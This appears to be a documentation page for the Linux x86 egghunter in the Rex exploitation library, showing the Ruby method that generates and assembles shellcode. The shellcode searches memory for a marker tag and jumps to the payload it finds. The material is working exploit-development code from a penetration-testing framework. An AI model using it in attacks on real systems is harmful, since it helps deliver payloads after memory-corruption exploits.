module Rex::Exploitation::Egghunter::Linux::X86

Constants

Alias

Public Instance Methods

hunter_stub(payload, badchars = '', opts = {}) click to toggle source

The egg hunter stub for linux/x86.

# File lib/rex/exploitation/egghunter.rb, line 259
      def hunter_stub(payload, badchars = '', opts = {})

        startreg = opts[:startreg]

        raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
        marker = "0x%x" % opts[:eggtag].unpack('V').first

        checksum = checksum_stub(payload, badchars, opts)

        startstub = ''
        if startreg
          if startreg.downcase != 'ecx'
            startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
          else
            startstub = "\n\tjmp next_addr"
          end
        end
        startstub << "\n\t" if startstub.length > 0

        assembly = <<EOS
  cld
#{startstub}
check_readable:
  or cx,0xfff
next_addr:
  inc ecx
  push 0x43   ; use 'sigaction' syscall
  pop eax
  int 0x80
  cmp al,0xf2
  je check_readable

check_for_tag:
  ; check that the tag matches once
  mov eax,#{marker}
  mov edi,ecx
  scasd
  jne next_addr
  ; it must match a second time too
  scasd
  jne next_addr

  ; check the checksum if the feature is enabled
#{checksum}

  ; jump to the payload
  jmp edi
EOS

        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

        # return the stub
        assembled_code
      end